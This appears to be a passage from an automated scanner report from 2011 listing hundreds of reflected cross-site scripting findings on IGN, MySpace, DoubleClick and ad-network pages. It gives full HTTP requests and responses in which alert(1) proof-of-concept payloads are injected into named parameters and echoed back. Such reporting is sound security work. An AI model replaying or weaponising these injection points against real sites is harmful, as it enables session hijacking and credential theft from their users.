1.705. http://xbox360.ign.com/articles/114/1147803p1.html [name of an arbitrarily supplied request parameter]

1.706. http://xbox360.ign.com/articles/114/1147803p1.html [name of an arbitrarily supplied request parameter]

1.707. http://xbox360.ign.com/articles/114/1147942p1.html [name of an arbitrarily supplied request parameter]

1.708. http://xbox360.ign.com/articles/114/1147942p1.html [name of an arbitrarily supplied request parameter]

1.709. http://xbox360.ign.com/articles/114/1148006p1.html [name of an arbitrarily supplied request parameter]

1.710. http://xbox360.ign.com/articles/114/1148006p1.html [name of an arbitrarily supplied request parameter]

1.711. http://xbox360.ign.com/articles/114/1148025c.html [name of an arbitrarily supplied request parameter]

1.712. http://xbox360.ign.com/articles/114/1148025c.html [name of an arbitrarily supplied request parameter]

1.713. http://xbox360.ign.com/articles/114/1148025p1.html [name of an arbitrarily supplied request parameter]

1.714. http://xbox360.ign.com/articles/114/1148025p1.html [name of an arbitrarily supplied request parameter]

1.715. http://xbox360.ign.com/articles/114/1148045c.html [name of an arbitrarily supplied request parameter]

1.716. http://xbox360.ign.com/articles/114/1148045c.html [name of an arbitrarily supplied request parameter]

1.717. http://xbox360.ign.com/articles/114/1148045p1.html [name of an arbitrarily supplied request parameter]

1.718. http://xbox360.ign.com/articles/114/1148045p1.html [name of an arbitrarily supplied request parameter]

1.719. http://xbox360.ign.com/articles/114/1148058c.html [name of an arbitrarily supplied request parameter]

1.720. http://xbox360.ign.com/articles/114/1148058c.html [name of an arbitrarily supplied request parameter]

1.721. http://xbox360.ign.com/articles/114/1148058p1.html [name of an arbitrarily supplied request parameter]

1.722. http://xbox360.ign.com/articles/114/1148058p1.html [name of an arbitrarily supplied request parameter]

1.723. http://xbox360.ign.com/index/features.html [name of an arbitrarily supplied request parameter]

1.724. http://xbox360.ign.com/index/features.html [name of an arbitrarily supplied request parameter]

1.725. http://xbox360.ign.com/index/games.html [name of an arbitrarily supplied request parameter]

1.726. http://xbox360.ign.com/index/games.html [name of an arbitrarily supplied request parameter]

1.727. http://xbox360.ign.com/index/images.html [name of an arbitrarily supplied request parameter]

1.728. http://xbox360.ign.com/index/images.html [name of an arbitrarily supplied request parameter]

1.729. http://xbox360.ign.com/index/latest-updates.html [name of an arbitrarily supplied request parameter]

1.730. http://xbox360.ign.com/index/latest-updates.html [name of an arbitrarily supplied request parameter]

1.731. http://xbox360.ign.com/index/latest-updates.html [types parameter]

1.732. http://xbox360.ign.com/index/latest-updates.html [types parameter]

1.733. http://xbox360.ign.com/index/latest-updates.html [types parameter]

1.734. http://xbox360.ign.com/index/news.html [name of an arbitrarily supplied request parameter]

1.735. http://xbox360.ign.com/index/news.html [name of an arbitrarily supplied request parameter]

1.736. http://xbox360.ign.com/index/previews.html [name of an arbitrarily supplied request parameter]

1.737. http://xbox360.ign.com/index/previews.html [name of an arbitrarily supplied request parameter]

1.738. http://xbox360.ign.com/index/reviews.html [name of an arbitrarily supplied request parameter]

1.739. http://xbox360.ign.com/index/reviews.html [name of an arbitrarily supplied request parameter]

1.740. http://xbox360.ign.com/index/upcoming.html [name of an arbitrarily supplied request parameter]

1.741. http://xbox360.ign.com/index/upcoming.html [name of an arbitrarily supplied request parameter]

1.742. http://xbox360.ign.com/index/videos.html [name of an arbitrarily supplied request parameter]

1.743. http://xbox360.ign.com/index/videos.html [name of an arbitrarily supplied request parameter]

1.744. http://xbox360.ign.com/objects/055/055051.html [name of an arbitrarily supplied request parameter]

1.745. http://xbox360.ign.com/objects/055/055051.html [name of an arbitrarily supplied request parameter]

1.746. http://xbox360.ign.com/objects/064/064330.html [name of an arbitrarily supplied request parameter]

1.747. http://xbox360.ign.com/objects/064/064330.html [name of an arbitrarily supplied request parameter]

1.748. http://xbox360.ign.com/objects/070/070921.html [name of an arbitrarily supplied request parameter]

1.749. http://xbox360.ign.com/objects/070/070921.html [name of an arbitrarily supplied request parameter]

1.750. http://xbox360.ign.com/objects/077/077644.html [name of an arbitrarily supplied request parameter]

1.751. http://xbox360.ign.com/objects/077/077644.html [name of an arbitrarily supplied request parameter]

1.752. http://xbox360.ign.com/objects/077/077723.html [name of an arbitrarily supplied request parameter]

1.753. http://xbox360.ign.com/objects/077/077723.html [name of an arbitrarily supplied request parameter]

1.754. http://xbox360.ign.com/objects/080/080342.html [name of an arbitrarily supplied request parameter]

1.755. http://xbox360.ign.com/objects/080/080342.html [name of an arbitrarily supplied request parameter]

1.756. http://xbox360.ign.com/objects/142/14221217.html [name of an arbitrarily supplied request parameter]

1.757. http://xbox360.ign.com/objects/142/14221217.html [name of an arbitrarily supplied request parameter]

1.758. http://xbox360.ign.com/objects/142/14235014.html [name of an arbitrarily supplied request parameter]

1.759. http://xbox360.ign.com/objects/142/14235014.html [name of an arbitrarily supplied request parameter]

1.760. http://xbox360.ign.com/objects/142/14293266.html [name of an arbitrarily supplied request parameter]

1.761. http://xbox360.ign.com/objects/142/14293266.html [name of an arbitrarily supplied request parameter]

1.762. http://xbox360.ign.com/objects/143/14304771.html [name of an arbitrarily supplied request parameter]

1.763. http://xbox360.ign.com/objects/143/14304771.html [name of an arbitrarily supplied request parameter]

1.764. http://xboxlive.ign.com/ [name of an arbitrarily supplied request parameter]

1.765. http://xboxlive.ign.com/ [name of an arbitrarily supplied request parameter]

1.766. http://xboxlive.ign.com/articles/113/1134848p1.html [name of an arbitrarily supplied request parameter]

1.767. http://xboxlive.ign.com/articles/113/1134848p1.html [name of an arbitrarily supplied request parameter]

1.768. http://xboxlive.ign.com/index/games.html [name of an arbitrarily supplied request parameter]

1.769. http://xboxlive.ign.com/index/games.html [name of an arbitrarily supplied request parameter]

1.770. http://xboxlive.ign.com/index/latest-updates.html [name of an arbitrarily supplied request parameter]

1.771. http://xboxlive.ign.com/index/latest-updates.html [name of an arbitrarily supplied request parameter]

1.772. http://api.myspace.com/-/opensearch/extensions/1.0/ [Referer HTTP header]

1.773. http://support.igninsider.com/ics/support/default.asp [Referer HTTP header]

1.774. http://wrapper.giga.de/a [Referer HTTP header]

1.775. http://wrapper.ign.com/a [Referer HTTP header]

1.776. http://myspace.com/ [name of an arbitrarily supplied request parameter]

1.777. http://optimized-by.rubiconproject.com/a/8276/13378/25879-2.js [ruid cookie]

1.778. http://s50.sitemeter.com/js/counter.js [IP cookie]

1.779. http://searchservice.myspace.com/index.cfm [d parameter]

1.780. http://searchservice.myspace.com/index.cfm [fuseaction parameter]

1.781. http://searchservice.myspace.com/index.cfm [g parameter]

1.782. http://searchservice.myspace.com/index.cfm [loc parameter]

1.783. http://searchservice.myspace.com/index.cfm [maxAge parameter]

1.784. http://searchservice.myspace.com/index.cfm [minAge parameter]

1.785. http://searchservice.myspace.com/index.cfm [name of an arbitrarily supplied request parameter]

1.786. http://searchservice.myspace.com/index.cfm [npic parameter]

1.787. http://searchservice.myspace.com/index.cfm [pg parameter]

1.788. http://searchservice.myspace.com/index.cfm [qry parameter]

1.789. http://searchservice.myspace.com/index.cfm [type parameter]

1.790. http://tag.admeld.com/ad/iframe/177/ignus/300x250/ign_front [meld_sess cookie]

1.791. http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us [meld_sess cookie]

1.792. http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us [meld_sess cookie]

1.793. http://tag.admeld.com/ad/iframe/185/thechive_sites/300x250/thechive_us [meld_sess cookie]

1.794. http://tag.admeld.com/ad/iframe/185/thechive_sites/300x250/thechive_us [meld_sess cookie]

1.795. http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us [meld_sess cookie]

1.796. http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us [meld_sess cookie]

1.797. http://tag.admeld.com/ad/json/100/glamtoptier/160x600/420105803 [meld_sess cookie]

1.798. http://tag.admeld.com/ad/json/100/glamtoptier/300x250/420105803 [meld_sess cookie]

1.799. http://tag.admeld.com/ad/json/100/glamtoptier/728x90/420105803 [meld_sess cookie]

1.800. http://www2.glam.com/app/site/affiliate/viewChannelModule.act [glam_bt cookie]

1.801. http://www2.glam.com/app/site/affiliate/viewChannelModule.act [glam_sid cookie]

1.802. http://www2.glam.com/app/site/affiliate/viewChannelModule.act [qcsegs cookie]

1.803. http://www35.glam.com/gad/glamadapt_jsrv.act [glam_sid cookie]



1. Cross-site scripting (reflected)
There are 803 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://ad.doubleclick.net/adj/N4881.mmath/B5196269.16 [mt_adid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4881.mmath/B5196269.16

Issue detail

The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ecb9a'-alert(1)-'9f8b5bd9678 was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4881.mmath/B5196269.16;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=115062657883708758&mt_id=108209&mt_adid=100293ecb9a'-alert(1)-'9f8b5bd9678&redirect=;ord=115062657883708758? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/300x250/thechive_us?t=1297045626926&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:27:19 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5832

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Jan 20 17:08:58 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
3Bh%3Dv8/3aa7/f/7e/%2a/l%3B235303334%3B0-0%3B0%3B59104090%3B4307-300/250%3B40362855/40380642/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=115062657883708758&mt_id=108209&mt_adid=100293ecb9a'-alert(1)-'9f8b5bd9678&redirect=http%3a%2f%2fclk.redcated/GRK/go/296095966/direct/01/\">
...[SNIP]...

1.2. http://ad.doubleclick.net/adj/N4881.mmath/B5196269.16 [mt_adid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4881.mmath/B5196269.16

Issue detail

The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ea05f"-alert(1)-"d7405e6c27 was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4881.mmath/B5196269.16;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=115062657883708758&mt_id=108209&mt_adid=100293ea05f"-alert(1)-"d7405e6c27&redirect=;ord=115062657883708758? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/300x250/thechive_us?t=1297045626926&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:27:15 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5828

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Jan 20 17:08:58 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
3Bh%3Dv8/3aa7/f/7d/%2a/l%3B235303334%3B0-0%3B0%3B59104090%3B4307-300/250%3B40362855/40380642/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=115062657883708758&mt_id=108209&mt_adid=100293ea05f"-alert(1)-"d7405e6c27&redirect=http%3a%2f%2fclk.redcated/GRK/go/296095966/direct/01/");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var
...[SNIP]...

1.3. http://ad.doubleclick.net/adj/N4881.mmath/B5196269.16 [mt_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4881.mmath/B5196269.16

Issue detail

The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b345"-alert(1)-"d5c45be131d was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4881.mmath/B5196269.16;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=115062657883708758&mt_id=1082092b345"-alert(1)-"d5c45be131d&mt_adid=100293&redirect=;ord=115062657883708758? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/300x250/thechive_us?t=1297045626926&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:27:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5832

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Jan 20 17:08:58 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
lick.net/click%3Bh%3Dv8/3aa7/f/7e/%2a/l%3B235303334%3B0-0%3B0%3B59104090%3B4307-300/250%3B40362855/40380642/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=115062657883708758&mt_id=1082092b345"-alert(1)-"d5c45be131d&mt_adid=100293&redirect=http%3a%2f%2fclk.atdmt.com/GRK/go/296095966/direct/01/");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "
...[SNIP]...

1.4. http://ad.doubleclick.net/adj/N4881.mmath/B5196269.16 [mt_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4881.mmath/B5196269.16

Issue detail

The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 64a23'-alert(1)-'2677801c6b9 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4881.mmath/B5196269.16;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=115062657883708758&mt_id=10820964a23'-alert(1)-'2677801c6b9&mt_adid=100293&redirect=;ord=115062657883708758? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/300x250/thechive_us?t=1297045626926&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:27:11 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5832

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Jan 20 17:08:58 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
lick.net/click%3Bh%3Dv8/3aa7/f/7e/%2a/l%3B235303334%3B0-0%3B0%3B59104090%3B4307-300/250%3B40362855/40380642/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=115062657883708758&mt_id=10820964a23'-alert(1)-'2677801c6b9&mt_adid=100293&redirect=http%3a%2f%2fclk.atdmt.com/GRK/go/296095966/direct/01/\">
...[SNIP]...

1.5. http://ad.doubleclick.net/adj/N4881.mmath/B5196269.16 [redirect parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4881.mmath/B5196269.16

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a56a1'-alert(1)-'9136e52bb72 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4881.mmath/B5196269.16;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=115062657883708758&mt_id=108209&mt_adid=100293&redirect=a56a1'-alert(1)-'9136e52bb72 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/300x250/thechive_us?t=1297045626926&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5832
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 07 Feb 2011 02:27:28 GMT
Expires: Mon, 07 Feb 2011 02:27:28 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Jan 20 17:08:58 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
aa7/f/7e/%2a/l%3B235303334%3B0-0%3B0%3B59104090%3B4307-300/250%3B40362855/40380642/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=115062657883708758&mt_id=108209&mt_adid=100293&redirect=a56a1'-alert(1)-'9136e52bb72http%3a%2f%2fclk.atdmt.com/GRK/go/296095966/direct/01/\">
...[SNIP]...

1.6. http://ad.doubleclick.net/adj/N4881.mmath/B5196269.16 [redirect parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4881.mmath/B5196269.16

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93598"-alert(1)-"2cf0fabfdd0 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4881.mmath/B5196269.16;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=115062657883708758&mt_id=108209&mt_adid=100293&redirect=93598"-alert(1)-"2cf0fabfdd0 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/300x250/thechive_us?t=1297045626926&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5832
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 07 Feb 2011 02:27:23 GMT
Expires: Mon, 07 Feb 2011 02:27:23 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Jan 20 17:08:58 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
aa7/f/7e/%2a/l%3B235303334%3B0-0%3B0%3B59104090%3B4307-300/250%3B40362855/40380642/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=115062657883708758&mt_id=108209&mt_adid=100293&redirect=93598"-alert(1)-"2cf0fabfdd0http%3a%2f%2fclk.atdmt.com/GRK/go/296095966/direct/01/");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow
...[SNIP]...

1.7. http://ad.doubleclick.net/adj/N4881.mmath/B5196269.16 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4881.mmath/B5196269.16

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e079"-alert(1)-"2a7444a0285 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4881.mmath/B5196269.16;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=1150626578837087582e079"-alert(1)-"2a7444a0285&mt_id=108209&mt_adid=100293&redirect=;ord=115062657883708758? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/300x250/thechive_us?t=1297045626926&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:26:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5832

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Jan 20 17:08:58 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
://ad.doubleclick.net/click%3Bh%3Dv8/3aa7/f/7e/%2a/l%3B235303334%3B0-0%3B0%3B59104090%3B4307-300/250%3B40362855/40380642/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=1150626578837087582e079"-alert(1)-"2a7444a0285&mt_id=108209&mt_adid=100293&redirect=http%3a%2f%2fclk.redcated/GRK/go/296095966/direct/01/");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscr
...[SNIP]...

1.8. http://ad.doubleclick.net/adj/N4881.mmath/B5196269.16 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4881.mmath/B5196269.16

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60df4'-alert(1)-'c9f82baf3eb was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4881.mmath/B5196269.16;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=11506265788370875860df4'-alert(1)-'c9f82baf3eb&mt_id=108209&mt_adid=100293&redirect=;ord=115062657883708758? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/300x250/thechive_us?t=1297045626926&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F22
Accept: */*
